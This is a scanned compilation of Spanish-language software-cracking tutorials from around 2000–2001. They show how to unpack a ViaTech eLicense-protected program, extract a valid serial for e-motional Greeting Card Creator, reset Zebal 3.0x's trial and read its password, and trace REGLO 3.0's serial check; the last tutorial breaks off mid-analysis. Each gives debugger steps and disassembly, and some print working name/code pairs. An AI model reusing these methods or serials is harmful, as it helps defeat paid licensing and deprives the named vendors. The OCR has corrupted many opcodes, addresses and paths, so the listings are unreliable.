Copyright (ce) 1998-2000 ViaTech, Inc. All rights reserved. 


For more information, visit our web site by clicking on the link below. 


Esta es la protección. | nteresante. No sé vosotros, pero yo desde el primer momento que la vi, me recordo a la protección 
vbox, y de esa forma la vamos a tratar. 


He visitado la web de Via Tech, www.elicense.com , existe una versión de prueba de la protección. La descargué y se la puse 
a un programa que ocupaba 1.3 MB, después de pasarle la protección, ocupaba 2 MB. Por tanto podemos deducir que quién 
usa esta protección no busca reducir espacio, sino proteger el programa, lo cuál como veremos a continuación no lo consigue 
:) 


Creo que la protección es fácilmente reconocible, ya que nos lo dice, pero voy a decir por encima alguna de las caraterísticas 
que he visto de esta protección. Lo primero, es que en el directorio del programa, podemos encontrar una dll, vtcpak24.dll, 
el 24, será por la versión supongo. Que si analizamos con File ImsPEctor, veremos que está empakada con Aspack (si os 
interesa, podéis utilizar Unaspack para desempaketarla). Además en tiempo de ejecución el programa crea otro archivo, s3vv-| 
---.2XCp, en los guiones aparecen numeros y letras de forma más o menos aleatoria, que curiosamente, también está 
empakado con Aspack. Este archivo tiene algo que ver con el estado de la licencia del producto. El funcionamiento básico, 
consiste en que el archivo principal, llama a vtpack24, y esta a su vez al archivo temporal, que es el que saca la ventana, 
luego vuelve a vtpack24 que a su vez devuelve al control al programa principal, una vez desempakado. 


AL ATAKE 


Bueno, ahora sí, vamos a por él. Ejecutamos el programa, nos aparece la ventana de antes, podemos hacer dos cosas, utilizar 
los handles de windows para meternos en el código, o podemos simplemente ir a Sice (Ct +D) y poner bpx 
getprocaddress, que es lo que haremos porque es más rápido, volvemos al programa (F5) y pulsamos Try. Aparecemos en 
Sice, desactivamos el breakpoint (bd*), y pulsamos F12 hasta que aparezcamos en algo que pueda parecerse a uno de los 
archivos anteriores. Apareceremos en s3vv----, pero lo que queremos es encontrar el lugar donde vamos al programa, una 
vez desempaketado, por tanto debemos llegar a vtpack24, para ello pulsamos F12 hasta que lleguemos allí. Aparecemos 
aquí: 


* Reference To: KERNEL32.LoadLibraryA, Ord:0190h 


| 

:024833F1 FF1584F04802 Call dword ptr [0248F084] <- La llamada al archivo temporal del que procedemos. 
:024833F7 8985D4F2FFFF mov dword ptr [ebp+FFFFF2D4], eax <- Aqui aparecemos. 

:024833FD 8B85D4F2FFFF mov eax, dword ptr [ebp+FFFFF2D4] 

:02483403 50 push eax 

:02483404 FF1560F04802 Call dword ptr [0248F060] 

:0248340A 8D8D18F4FFFF lea ecx, dword ptr [ebp+FFFFF418] 

:02483410 51 push ecx 

:02483411 E8800E0000 Call 02484296 


:02483416 83C404 add esp, 00000004 
:02483419 83BDD4F2FFFFOO cmp dword ptr [ebp+FFFFF2D4], 00000000 
:02483420 7505 j¡ne 02483427 


:02483427 833D3417490201 cmp dword ptr [024917341], 00000001 
:0248342E 751D ¡ne 0248344D 


:0248344D 5E pop esi 

:0248344E 5D pop ebp 

:0248344F 5B pop ebx 

:02483450 8BE5 mov esp, ebp 

:02483452 5D pop ebp 

:02483453 FF2544174902 jmp dword ptr [02491744] <- Saltamos al programa principal, este es nuestro "Program Entry 
Point'. Anotamos su valor que es 4509F8. (que coincide con el del programa original, así que nos da igual) 


Aqui está todo el código necesario. Bueno, desde donde aparecemos vamos pulsando F1O hasta llegar a 02483453, que es 
desde donde vamos al programa en sí, una vez desmpaketado. Una vez en esa dirección, creamos un bucle infinito, para 
dejar volcado el programa en memoria, para ello, vamos a meter código asm con Sice, con el comando a. Escribimos a eip, y 
nos aparecerá :02483453 en la línea de comando, metemos jmp eip y pulsamos enter un par de veces. Pulsamos F5, y se 
quedo el programa volcado en la memoria, esperando a que nosotros lo recojamos con las redes de procdump. 


Pues eso, abrimos Procdump, y en la ventana de tareas activas, selecionamos con el botón secundario del ratón nuestro 
programa, cpu_ind_r, y en el menú emergente seleccionamos dump (full). nos pedirá el nombre del nuevo ejecutable y ya 
está. Cerramos el programa que hemos dejado en la memoria, seleccionando en el menú anterior Kill Task. 


Probamos el programa y ... ¿qué es esto? ¿qué pasa? Nos aparece lo siguiente: 


Error al iniciar el programa 


7 


Lo que ha pasado, es que nuestra tabla de importaciones está mal. Para solucionar el problema, volvemos a repetir todo el 
proceso, hasta el momento en el que usamos procdump. (ahora sabéis porque dije bd y no bc ;) ) 


Abrimos Procdump, y lo primero de todo vamos a las opciones, y seleccionamos Rebuilt New | mpot Table, una vez 
seleccionado hacemos lo mismo de antes. Lo probamos y ... ¡¡¡ PERFECTO !!! Fuera protección, y puesto que el programa no 
lleva ninguna más, hemos terminado. 


FINALIZANDO 


Bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo. Espero que os haya resultado útil este tuto. No olvidéis que nuestro objetivo sólo es 
aprender. Sin contar con la diversión que esto supone por supuesto ;-)) 


Un Gran Saludo para todos los miembros de [K-FoR], para los amigos de Tutoriales 2000 y para todos vosotros. [KRaVIiTZ], 
vuelve pronto ;-) 


Hasta la próxima... 
«>» —==*ze=-« » 


Mi correo: kuato thortdhotmail.com 


La página de [K-FoR]: http://pagina. de/kfor 


« >») —o==*zeo-« » 
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Programa: — e-motional Greeting Card Creator v1.01 


PROTECCION: Serial. 

Objetivo: Conseguir un número de serie válido 

Descripcion: Programa para crear tarjetas de saludos. 

Dificultad: Newbie 

DOWNLOAD: http: //www.e- motional.com 

Herramientas: W32Dasm, file insPEctor, Softl CE, eXeScope 

CRACKER: ACT_Mago FECHA: 20/02/2001 

INTRODUCCION 

Tutorial N“20 


Hola amigos, presento mi vigésimo tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 

actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
En este tutorial usaremos el Softl CE y el W32Dasm. Si no los tienes instalados puedes bajártelos en 
www.crackstore.com . Asumo que tienes conocimientos básicos sobre como usarlos. Y para terminar con la INTRO 


debo decir : ESTE TEXTO HA SIDO ESCRITO SÓLO CON PROPÓSITOS EDUCACIONALES. 


AL ATAKE 


| Comentario del Programa | 


Programa para crear tarjetas de saludos. 


Lo que nos interesa... el programa es distribuido como shareware, y para tener la versión full del programa 
debes registrarte y para eso debes pagar la suma de $19.95 US. 


Contamos con Softl CE :) ... 


Antes de abrir el programa lo analizamos con file insPEctor v3.5 el que nos mostrará información realmente 
importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará los siguientes datos: 


e El programa está desarrollado en Microsoft Visual C++ 5.0 
e No está empacado 


A continuación... cerramos file insPEctor v3.5 y abrimos e-motional Greeting Card Creator v1.01 


Abrimos el programa, le damos al botón About, luego a Register Now! y ya estamos en la caja de registro, 
la que nos pide los siguientes datos: 


User name: 
Registration Code: 


Como hacemos siempre llenamos la caja con cualquier dato, le damos click a Register y por supuesto que el 
programa no aceptará el código de registro y nos mostrará un mensaje como este... 


Registration Unsuccessful 


[This User Name does not match the registration code entered. 


A continuación... cerramos e-motional Greeting Card Creator v1.01 


| Usando el W32Dasm | 


Abrimos W32Dasm y luego nos vamos a la opción Disassembler > Open File to Disassemble... buscamos 
la carpeta en donde está instalado el programa y abrimos el archivo Creator.exe. 


Una vez desensamblado el archivo vamos a Refs > String Data References y buscamos el mensaje que 
nos decía que nuestro código de registro era inválido: se verá algo así... 


“TextColor" 

“Thank you for registering the" 
"The text is too large to fit on" 
"There was an error scanning the" 
"This program is registered to" 
"This User Name does not match" 
"“TransparentBack" 

"TWAcquire entry" 
"TWAIN_32.DLL" 


Le damos doble click y estaremos en el código que nos interesa... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00403374 (C) <== de aquí viene el mensaje 


:004034F8 6A10 push 00000010 


* Possible StringData Ref from Data Obj ->"Registration Unsuccessful" 


:004034FA 6838A34400 push 0044A338 


* Possible StringData Ref from Data Obj ->"This User Name does not match 
"->"the registration code entered. "| 
:004034FF 6878A24400 push 0044A278 


Tenemos la dirección 00403374, y para ir a examinarla vamos a Goto > Goto Code Location e insertamos 
el número, luego le damos a OK y estaremos aquí... 


:00403372 85C0 test eax, eax 
:00403374 0F847E010000 je 004034F8 
:0040337A 51 push ecx 


Y si subimos unas pocas líneas veremos lo siguiente... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00403302 (C) 


:00403335 51 push ecx 

:00403336 8D54240C lea edx, dword ptr [esp+0C] 
:0040333A 8BCC mov ecx, esp 

:0040333C 8964241C mov dword ptr [esp+1C], esp 
:00403340 52 push edx 

:00403341 E845190300 call 00434C8B 

:00403346 51 push ecx 

:00403347 8D442414 lea eax, dword ptr [esp+14] 
:0040334B 8BCC mov ecx, esp 

:0040334D 8964241C mov dword ptr [esp+1C], esp 
:00403351 50 push eax 

:00403352 C684249400000007 mov byte ptr [esp+00000094], 07 
:0040335A E82C190300 call 00434C8B 

:0040335F 889C2490000000 mov byte ptr [esp+00000090], bl 
:00403366 E8B5020000 call 00403620 

:0040336B 8BC8 mov ecx, eax 

:0040336D E8DEF2FFFF call 00402650 <== la CALL importante :) 
:00403372 85C0 test eax, eax 

:00403374 0F847E010000 je 004034F8 

:0040337A 51 push ecx 


Sobre el salto se pueden ver varias LLAMADAS; pero hay una que nos importa en este pedazo de 
código..anotamos la CALL 0040336D y vamos al Symbol Loader del SoftlCE, para poner un breakpoint e 
investigar los valores :) 


| Usando el SoftlCE | 


Abrimos el Symbol Loader y vamos a File > Open Module... buscamos el ejecutable del programa, lo 
abrimos y luego vamos a Module > Load y cuando nos salga el mensaje de que ha ocurrido un error, 
seguimos adelante. 


El Softl CE romperá y en ese instante ponemos el breakpoint bpx 0040336D [ENTER] > [F5], nos saldrá el 
programa y lo que ahora debemos hacer es ir a la caja de registro, poner nuestro nombre, cualquier número 
de registro y darle click a Register, y como hemos puesto el breakpoint el Softl CE romperá nuevamente 
dejándonos aquí... 


:0040336D E8DEF2FFFF CALL 00402650 <== caemos aquí, entramos con F8 
:00403372 85C0 TEST EAX,EAX 

:00403374 0F847£010000 JZ 004034F8 <== con r fl z [F5] registro aceptado 
:0040337A 51 PUSH  ECX 


Chequeamos valores en la CALL y como no hay resultados entramos en la CALL presionando F8, caemos 
aquí... 


:00402650 6AFF PUSH FF <== caemos aquí, seguimos con il 


Bueno esta parte es larga...pero vale la pena... 


Luego de caer en 00402650 seguimos con F10 43 veces para caer aquí... 


MOV DL, [EAX] <== d eax = NUESTRO REGISTRO VÁLIDO 


Al colocar d eax en el MOV 004026E7 tenemos nuestro número de serie válido, en mi caso la caja quedaría 
así... 


User name: Act MagO 
Registration Code: 64883 


Le damos click a Register y... 


Registration Successful! 


hank you for registering the program. 


Hey!!, pero que es eso?!!!...nos hemos registrado y el deseo de dinero de estos tipos no descansa, ahora en 
el lugar donde estaba el botón para acceder a la caja de registro hay uno para comprar una copia adicional 
del programa!!... pero ya saben es sólo tomar el eXeScope y darle un retoque a ese cuadro :), supongo que a 
estas alturas no es necesario que explique como se hace :) 


Programa crackeado... 


Nota: 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoO hotmail.com 


| Saludos | 


e PrOfEsOr X ( my best friend ) 
e [KRaViTZ] ( suerte amigo ) 
e [ DeK_OIiN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers.ws 


e ViPER ( creador de file insPEctor ) file insPEctor web site http://www. finspec. swsites.net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo 


Chao!! 
Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 
recuerden, lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Act MagO 20 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: Zebal 3.0x 

PROTECCION: Clave de Usuario y 15 días de evaluación 

Objetivo: Saltarnos lo de los 15 días y/o registrarnos 

Descripcion: Robot para conversar en el IRC 

Dificultad: Newbie 

DOWNLOAD: http: //www.readysoft .com/home/coding/ 

Herramientas: SoftIce v4.05 y Filemon (sin Mortadelo ;) 

CRACKER: Crick FECHA: 21/03/2001 
INTRODUCCION 


Hace tiempo, alguien (no sé quién) propuso en el topic del canal Hcrackers del IRC-Hispano este programa 
como objetivo. Yo me lo bajé. El programita es un robot que puedes conectar al IRC con el nick que quieras 
y mantiene conversaciones semi-inteligentes con la peña. 


Es shareware (3000 pelas!!!). Y, si no lo registras, deja de funcionar a los 15 días de instalarlo. (Y no vale 
retrasar el reloj... no funciona) 


El programa está hecho con Clipper (todavía hay gente que programa con eso... uf!) y el ejecutable es un New 
Executable (NE) 


AL ATAKE 


Para que el programa deje de funcionar a los 15 días de la instalación, lo que hace es crear un fichero en 
YWINDOWSISYSTEM que se llama OLECPX32.DAT (olé!), en realidad es una base de datos, un .DBF 'camuflao". 
Y ¿qué pasaría si lo borrásemos? 

Pues que lo vuelve a crear y ya tenemos otros 15 días (menuda protección!!!) 


El Filemon se chiva del acceso a este fichero: 


112 15:59:54 FIVEWIN Search C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS OLECPX32.DAT 

113 15:59:54 FIVEWIN Open C:IWINDOWSAISYSTEMMOLECPX32.DAT SUCCESS OPENEXISTING READONLY DENYWRITE 
114 15:59:54 FIVEWIN Read C:IWINDOWSISYSTEMMOLECPX32.DAT SUCCESS Offset: 0 Length: 32 
115 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 32 Length: 8 
116 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 40 Length: 32 
117 15:59:54 FIVEWIN Read C:IWINDOWSISYSTEMMOLECPX32.DAT SUCCESS Offset: 72 Length: 8 
118 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 80 Length: 32 
119 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 112 Length: 8 
120 15:59:54 FIVEWIN Read C:IWINDOWSYASYSTEMMOLECPX32.DAT SUCCESS Offset: 120 Length: 32 
121 15:59:54 FIVEWIN Read C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 152 Length: 8 
122 15:59:54 FIVEWIN Read C:IWINDOWSYNSYSTEMMOLECPX32.DAT SUCCESS Offset: 160 Length: 32 
123 15:59:54 FIVEWIN Close C:IWINDOWSAISYSTEMMOLECPX32.DAT SUCCESS CLOSE_FINAL 

124 15:59:54 FIVEWIN Open C:IWINDOWSANSYSTEMMOLECPX32.DAT SUCCESS CREATENEW REPLACEEXISTING 
READWRITE COMPATIBILITY 

125 15:59:54 FIVEWIN Write C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 0 Length: 32 
126 15:59:54 FIVEWIN Write C:IWINDOWSYSYSTEMMOLECPX32.DAT SUCCESS Offset: 32 Length: 8 
127 15:59:54 FIVEWIN Write C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 40 Length: 32 
128 15:59:54 FIVEWIN Write C:IWINDOWSA1SYSTEMMOLECPX32.DAT SUCCESS Offset: 72 Length: 8 
129 15:59:54 FIVEWIN Write C:IWINDOWSA1SYSTEMMOLECPX32.DAT SUCCESS Offset: 80 Length: 32 
130 15:59:54 FIVEWIN Write C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 112 Length: 8 
131 15:59:54 FIVEWIN Write C:XWINDOWSA1SYSTEMMOLECPX32.DAT SUCCESS Offset: 120 Length: 32 
132 15:59:54 FIVEWIN Write C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS Offset: 152 Length: 8 
133 15:59:54 FIVEWIN Write C:IWINDOWSA1SYSTEMMOLECPX32.DAT SUCCESS Offset: 160 Length: 1 
134 15:59:54 FIVEWIN Close C:IWINDOWSASYSTEMMOLECPX32.DAT SUCCESS CLOSE_FINAL 


Primero lo abre, lo lee y luego lo reescribe y lo cierra. Lo que hace es modificar un campo que controla la fecha en que lo 
usas. En fin, una chorrada. 


Para ir un poco más lejos y 'disfrutar' (lo pongo entre comillas porque no es un programa que me guste especialmente) de él 
en todo su explendor ;) lo registraremos y así tendremos disponibles todas las opciones (edición de la mente de Zebal, etc...) 


Al grano: 
Cuando intentas registrar el programa, aparece un diálogo pidiendo Usuario y Contraseña y un botón para 'registrar”. Si la 
contraseña (clave) no es correcta, sale un messagebox diciéndolo... Pues empecemos por ahí. 


Abrimos el diálogo de registro y escribimos el usuario y la clave. Antes de darle al botón de registrar, entramos en el SICE y 
ponemos un bpx messagebox y con ES salimos. 

Ahora sí pulsamos el botón de registrar y aparecemos en sice. Con F12 (las veces que haga falta) salimos del messagebox y 
volveremos al programa (lo vereis como FIVEWIN). 


Este es el código: 
EAX=000204EB EBX=17B70282 ECX=00000001 EDX=81734117 ESI=00022BF9 
EDI=0002A990 EBP=00007C0A ESP=00007BFC EIP=0000596A od Is zAP Cc 


CS=1A47 DS=1A87 SS=1A87 ES=4117 FS=0000 GS=0000 S5S:00007C06=41170515 

byt PROT--- (0) 
4117:000004D7 39 36 32 4D 35 39 59 34-52 00 01 00 00 00 00 00 962M59Y4R....... 
4117:000004E7 00 00 28 00 4E 6F 6D 62-72 65 20 6F 20 63 F3 64 ..(.Nombre o c.d 


4117:000004F7 69 67 6F 20 64 65 20 72-65 67 69 73 74 72 6F 20 igo de registro 

4117:00000507 69 6É 63 6F 72 72 65 63-74 6F 73 00 12 00 45 52 incorrectos...ER 
4117:00000517 52 4F 52 20 44 45 20 52-45 47 49 53 54 52 4F 00 ROR DE REGISTRO. 
4117:00000527 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ..cocoocoooo..... 


PROT16 
1A47:5904 PUSH BP <<<-- Aquí ponemos un BPX 
1A47:5905 MOV BP,SP 
1A47:5907 SUB SP,04 
1A47:590A PUSH SI 
1A47:590B PUSH DI 
1A47:590C PUSH 00 
1A47:590E CALL 3D5F:0376 
1A47:5913 ADD SP,02 


1A47:5916 CMP AX,0001 


Ni 
1A47:5919 JBE 5927 
1A47:591B PUSH 02 
1A47:591D CALL 3D5F:0500 
1A47:5922 ADD SP,02 
1A47:5925 JMP 592D 
1A47:5927 MOV DX, [BP+08] 
14A47:592A MOV AX, [BP+06] 
1A47:592D MOV [BP-02],DX 
1A47:5930 MOV [BP-04],AX 
1A47:5933 PUSH DS 
1A447:5934 PUSH FFFFO0O01 
1A47:593A CALL 1A3F:0286 
1A47:593F ADD SP,04 
1447:5942 PUSH AX 
1A47:5943 CALL 1A1F:ED7E 
1447:5948 ADD SP,04 
1A47:594B CALL 1A47:16CF 
1A47:5950 OR AX,AX 
1A47:5952 JZ 595B 
1447:5954 CALL USER!GETACTIVEWINDOW 
1A47:5959 JMP 595D 
1A47:595B XOR AX, AX 
1447:595D PUSH AX 
14A47:595E PUSH FF 
1A47:5960 CALL 3D5F:0500 
1A47:5965 ADD SP,02 
1447:5968 PUSH DX 
1447:5969 PUSH AX 
1A47:596A PUSH DWORD PTR [BP-04] <<<-= Aquí está el mensaje de error 


1A47:596E PUSH 03 

1A47:5970 CALL 3D5F:05F4 

1A47:5975 ADD SP,02 

1A47:5978 OR AX,[BP+0A] 

1A47:597B PUSH AX 

1A47:597C CALL USER!'MESSAGEBOX 
1A47:598l PUSHAX <<<-- Aquí apareceremos después de los F12 
1A47:5982 CALL 3D5F:0826 

1A47:5987 ADD SP,02 

1A47:598A POP DI 

1A47:598B POP SI 

1A47:598C LEAVE 

1A47:598D RETF 


Aterrizaremos en el PUSH AX, después de la llamada a messagebox. Ponemos un BPX al principio de la 
rutina: en 5904 PUSH BP, le damos a F5 para salir y nos volvemos a registrar habiendo quitado 
antes el bpx messagebox. Volveremos a SICE en el bpx del PUSH BP. Si mirais más abajo vereis que 
mete en la pila la dirección del mensaje de error antes de llamar a messagebox. Pues bien, si 
miramos en esa dirección, en *[bp-04]está el mensaje de error y... un poco más arriba ¡LA CLAVE 
CORRECTA! . 


Como veis, con esta protección se venderán pocas copias del Zebal 3.0x 


Un saludo. Crick 


Todo el material aquí editado es para uso exclusívamente didáctico. 
Crick NO se responsabiliza del uso ilegal de este material. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: REGLO 3.0,HORAS 3.7, DELETOR 2.6, 
FILO 2.0,UNIOS 1.9,EXICON 
1.9,etc. 


ADVERTENCIA: Si lo que estas buscando es un serial para algunas de las 
aplicaciones nombradas arriba, no pierdas el tiempo leyendo este extenso tutorial. Hace 
una búsqueda en la web o andá a alguno de los tantos sitios dedicados a proveer seriales. Si 
por el contrario te interesa seguir aprendiendo ingeniería inversa, creo que vale la pena . 
Como de costumbre y para no demorar a los que vienen siguiendo todos los tutos, los 
detalles que hayan sido explicados con anterioridad serán obviados. Si hay algo que no se 
comprende, recomiendo leer los ensayos anteriores. 


INTRODUCCION 


Saludos a toda la banda de seguidores. No sin esfuerzo hemos llegado al décimo tutorial. Agradezco los e-mails 
con saludos y preguntas (quiere decir que alguien lee esta serie de tutoriales). A los que me preguntaban que había 
pasado que no escribía otro tuto, la respuesta (como bién dijo Karpoff unos días atrás) es que no me pareció serio 
dedicarle un tutorial a programas con el mismo esquema de protección que los vistos hasta ahora. Es más, con las 9 
publicaciones anteriores, es posible crackear una gran cantidad de aplicaciones shareware que existen en la web. En esta 
ocación nos concentraremos en el esquema de protección de REGLO versión 3.0, que nos permitirá observar algunas 
cosas nuevas (entre ellas el concepto de número mágico) y seguiremos practicando asembler, ya que el serial buscado 
no se nos presentará completo en ningún registro sino tendrá que sortear una serie de cálculos como ya veremos. Este 
utilitario es una versatil regla en pantalla ideada para diseñadores, posee además una ventana de magnificación. El costo 
de registración es de $15, por lo que lo único que nos interesará es su estructura de protección. Se acuerdan del tutorial 
N? 5, ahí teníamos un programa de $150 con un esquema de protección de $5. Bueno en este caso sucede lo contrario. 
En general la gente de BASTA diseña buenas aplicaciones a un precio realmente accesible. Los utilitarios no exceden 
los 350kb lo que los hace ideales para que podamos aprender de ellos. 


AL ATAKE 


A lo nuestro, ejecutamos el programa y vamos a about (con el botón derecho del mouse) , una vez allí click en 
registration. Llenamos la única casilla que se nos presenta para introducir el serial, en mi caso puse 12345678-90123456. 


NOTA: cuando se te presenta una única casilla, lo primero es desensamblarlo con el W32DSM por si el serial es 
hardcoded , es decir es único y esta escrito en las string references. (Te acuerdas del tutorial N*4 ?). En este caso no es 
así, sino a estas alturas sería faltarte el respeto ;-) 


Como siempre Control-D, bpxhmemcpy (ya sabes que me gusta recorrer el ejecutable y ver que esta haciendo), F5 (para 
volver a windows) , le damos al botón OK y entramos en el Soft ice. Con bd00 desabilitamos el breakpoint que ya cumplió 
su función. Con unos siete F12's llegamos a REGLO'TEXT que es lo que deseamos. Lo que realmente nos interesa (el 
centro de la rutina de comprobación) se encuentra en la posición 40FB09. Hacia allí vamos con un bpx 40F'B09 seguido de 
FS. En esi tenemos nuestro falso serial y en ecx tenemos OF. Por lo que en principio moverá a 'al' 36 (6) nuestro último 
número. 


:0040FBO09 8A0431 mov al, byte ptr [ecx+esi]. Toma el último componente del serial 
:0040FBOC 3C30 cmp al, 30 Si es menor que 30 salta a error 
:0040FBOE 0F8CCDO00000 — j10040FBE1 Chico malo o error 

:0040FB 14 3C39 cmp al, 39 Si es mayor que 39 salta a error 
:0040FB 16 OF8FCS000000 — jg0040FBE1 Chico malo o error 

:0040FB1C 8BC1 mov eax, ecx Mueve el ecx a eax 

:0040FB1E 49 dec ecx Decrementa el ecx (para tomar otro) 
:0040FB 1F 85C0 test eax, eax Se fija si hay más 

:0040FB21 75E6 jnz 0040FB09 Como hay 15 más, repite el proceso. 


Cuando colocamos el falso serial en el casillero, nada sabíamos de él. Solo nos dimos cuenta que entraban 16 caracteres. 

Ahora no solo sabemos que son 16, sino también que tienen que ser números. Ya que tienen que estar comprendidos entre 
30 y 39 (0 y 9 en ascii), caso contrario nos saca de la rutina de comprobación. Si lo vas trazando con el Soft-Ice verás que 
comienza por el último número (en mi caso 36 = 6) y sigue decreciendo hasta llegar al primero. Hasta aquí está todo claro, 


:0040FB23 OFBESEOF movsx ebx, byte ptr [esi+OF] Pone en ebx el ultimo n” , 36 
:0040FB27 83EB30 sub ebx, 00000030 Le resta 30, ebx=6 
:0040FB2A 8D4301 lea eax, dword ptr [ebx+01] Eax =7 (6 +1) 
:0040FB2D 83FS0F cmp eax, O0000000F Si no supera 15 saltar 
:0040FB30 7C03 31 0040FB35 Salta 

:0040FB 32 83E80F sub eax, 0000000F 

:0040FB35 40 inc eax Incrementa eax eax = 8 
:0040FB36 83F80F cmp eax, 0000000F 

:0040FB39 7C03 31 0040FB3E Salta 

:0040FB3B 83E80F sub eax, 0000000F 

:0040FB3E 8BC8 mov ecx, eax Ecx = eax = 8 

:0040FB40 83C003 add eax, 00000003 Fax=B=l11 

:0040FB43 83F8S0F cmp eax, 0000000F 

:0040FB46 7C03 31 0040FB4B Salta 

:0040FB48 83E80F sub eax, 0000000F 

:0040FB4B OFBE3C31 movsx edi, byte ptr [ecx+esi] Pone en edi el noveno n?* 39  (esi+8) 
:0040FB4F 8BC8 mov ecx, eax Ecx = B 

:0040FB51 83C00 add eax, 00000003 FEax=E= 14 

:0040FB54 83EF3 sub edi, 00000030 Edi = 9 

:0040FB57 83F80 cmp eax, 0000000F 

:0040FB5A 7C03 jl 0040 FBS5F Salta 

:0040FB5C 83E80 sub eax, 0000000F 


:0040FB5F OFBEOC movsx ecx, byte ptr [ecx+esi] Pone en ecx el 12* n? del serial = 32 


:0040FB63 SBDO mov edx, eax Edx =eax=E=14 


:0040FB65 83C0 add eax, 00000003 Eax = 11(hex) = 17 

:0040FB68 8D0OC89 lea ecx, dword ptr [ecx+4*ecx] Ecx = 32*4432 = FA(hex) = 250 
:0040FB6B 83FSOF cmp eax, 0000000F Eax = 17 > 15 (no saltará) 
:0040FB6E 8D0C89 lea ecx, dword ptr [ecx+4*ecx] Ecx = 250*44+250 = 4E2 = 1250 
:0040FB71 8DOC8D40EDFF lea ecx, dword ptr [4*ecx+FFFFED40]  Ecx = 1250*4-4800 = C8 = 200 
:0040FB78 7C03 3l 0040FB7D No salta 

:0040FB7A 83ES0F sub eax, 0000000F Eax = 17 - 15=2 

:0040FB7D OFBE1432 movsx edx, byte ptr [edx+esi] Edx = 35 ( 15” núm del falso serial ) 
:0040FB81 0FBE0430 movsx eax, byte ptr [eax+esi] Eax=33 (37 num. falso serial ) 
:0040FB85 8D1492 lea edx, dword ptr [edx+4*edx] Edx = 35*4435 = 109(h) = 265 
:0040FB88 03C8 add ecx, eax Ecx = C8+33= FB(h) = 200+51 = 251 


:0040FB8A 8DsC5S1FOFDFFFF — lea ecx, dword ptr [ecx+2*edx-00000210] Ecx = 2514+265*2-528 = 253 = 
FD(hex) 


:0040FB91 83F907 cmp ecx, 00000007 Es evidente que EFD es distinto a 7 


:0040FB94 754B jnz 0040FBE1 Salta a chico malo o error 


Sigues ahí ???? Ahhh menos mal. Si te sirve de consuelo todo el ezfuerso invertido en este análisis te servirá para muchos 
programas (todos???) de BASTA software. Te das cuenta porque le decía a los que buscaban un serial que no pierdan el 
tiempo leyendo este tutorial. Seguimos. Como FD es distinto de 07 el salto se efectuará y nos sacará de la rutina de 
comprobación. ¿¿¿ Que hacemos ? PP oococcconoonesnss 


Bueno podemos hacer varias cosas. Podemos invertir el salto condicionado en 40FB94. Podemos hacer que compare ecx, 
000000FD en 40FB91. O podemos jugar con las matemáticas y encontrar un número que sortee las premisas anteriores. No 
es tan difícil como parece, de los 16 números del serial solo algunos son fundamentales en el algoritmo. No sufras que 
encontré un número que en principio tendría que funcionar. Te dejo a vos que reemplaces 1234567890123456 por 
1231560890127401 y compruebes que ecx = 00000007. 


Desgraciadamente, la cosa no termina ahí. El programador realmente nos quería hacer las cosas difíciles. Ya hemos 
logrado eludir el primer salto a error, veamos como sigue 


:0040FB94 754B jne 0040FBE1 Aquí estábamos 

:0040FB96 33C0 xor eax, eax Pone el eax en cero 

:0040FB98 B90F000000 mov ecx, 0000000F Pone 15 en ecx 

:0040FB9D 0FBE1431 movsx edx, byte ptr [ecx+esi] Toma el último n” del serial,ahora 31= 1 
:0040FBA1 OFAFD1 imul edx, ecx Edx = 31* F= 49*15 = 2DF(h) = 735 

:0040FBA4 03C2 add eax, edx Eax = 0 + 2DK(h) = 2DF 

:0040FBAG6 SBD1 mov edx, ecx Edx = 15 = F(h) 

:0040FBAS 49 dec ecx Ecx = 14 = E(h) 

:0040FBA9 85D2 test edx, edx Se fija si hay más 

:0OO4OFBAB  75FO jne 0040FB9D Si hay más salta 


Lo que hace es lo siguiente: toma el último número del serial, lo multiplica por 15 y lo guarda en eax. Toma el anteúltimo 
número del serial, lo multiplica por 14 y se lo suma a eax. Y así sucesivamente con los 16 números del serial. Al salir 
del lazo con 1231560890127401 como serial de prueba, Eax = 17F4(h) y Ebx=1 


:0040FBAD  — 8D4B0OE lea ecx, dword ptr [ebx+0E] Ecx=1+E=F 
:0040FBBO 83F90F cmp ecx, 0000000F 

:0040FBB3  “7C03 31 0040FBB8 No salta 

:0040FBB5 83E90F sub ecx, 0OO00O0OF Ecx =0 

:0040FBB8 0FBE1431 movsx edx, byte ptr [ecx+esi] Edx = 31 primer número del serial 


:0040FBBC OFAFD1 imul edx, ecx Edx =0 


:0040FBBF  — 2BC2 sub eax, edx Eax = 17F4(h)- 0 = 17F4(h) 


